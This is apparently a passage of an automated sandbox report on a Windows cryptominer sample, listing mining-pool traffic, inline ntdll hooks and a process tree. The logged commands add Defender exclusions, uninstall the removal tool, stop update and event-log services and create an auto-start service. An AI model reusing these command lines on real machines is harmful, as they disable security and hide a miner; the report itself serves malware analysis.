                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bdcb83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000ba23df2e6f6bb593cde3faa97f595c6616c3663a3f3c435382b853a01873d1334b","job_id":"CJheU9azC6feI9mUObD9xc5moW1X"
                                                                              Jan 10, 2025 10:18:02.472278118 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 39 63 62 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010c9cb83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000eadd873f8fe805e90bc69caa6936f21f23992a8bb65edd2ccf681d60f54349454e","job_id":"AHaeV7TH9eAt+clQKSkNiaLud9Wo"


                                                                              Code Manipulations

                                                                              User Modules

                                                                              Hook Summary

                                                                              Function NameHook TypeActive in Processes
                                                                              ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                              NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                              ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                              NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                              ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                              NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                              NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                                              ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                              ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                              NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                              RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                                                              NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                              NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                              ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                              ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe

                                                                              Processes

                                                                              Process: winlogon.exe, Module: ntdll.dll
                                                                              Function NameHook TypeNew Data
                                                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                              Process: explorer.exe, Module: ntdll.dll
                                                                              Function NameHook TypeNew Data
                                                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:04:15:57
                                                                              Start date:10/01/2025
                                                                              Path:C:\Users\user\Desktop\gem2.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\gem2.exe"
                                                                              Imagebase:0x7ff72a7b0000
                                                                              File size:2'876'416 bytes
                                                                              MD5 hash:990A3F3B1273510F210FB9B541DA219F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:04:15:57
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:04:15:57
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff6218c0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\wusa.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff6085f0000
                                                                              File size:345'088 bytes
                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:14
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop bits
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:15
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:16
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:17
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:18
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:19
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:20
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:21
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:22
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:23
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\dialer.exe
                                                                              Imagebase:0x7ff64c5c0000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:24
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:25
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:26
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:27
                                                                              Start time:04:16:03
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe delete "GeekBrains"
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:28
                                                                              Start time:04:16:03
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:29
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\winlogon.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:winlogon.exe
                                                                              Imagebase:0x7ff6156c0000
                                                                              File size:906'240 bytes
                                                                              MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:30
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:31
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:32
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:33
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe start "GeekBrains"
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:34
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:35
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:36
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\lsass.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\lsass.exe
                                                                              Imagebase:0x7ff654c90000
                                                                              File size:59'456 bytes
                                                                              MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:37
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\ProgramData\Screenshots\Lightshot.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\ProgramData\Screenshots\Lightshot.exe
                                                                              Imagebase:0x7ff6e4d80000
                                                                              File size:2'876'416 bytes
                                                                              MD5 hash:990A3F3B1273510F210FB9B541DA219F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 66%, ReversingLabs
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:38
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:39
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:40
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:41
                                                                              Start time:04:16:05
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\dwm.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"dwm.exe"
                                                                              Imagebase:0x7ff79d4a0000
                                                                              File size:94'720 bytes
                                                                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:42
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff6218c0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:43
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:44
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:45
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
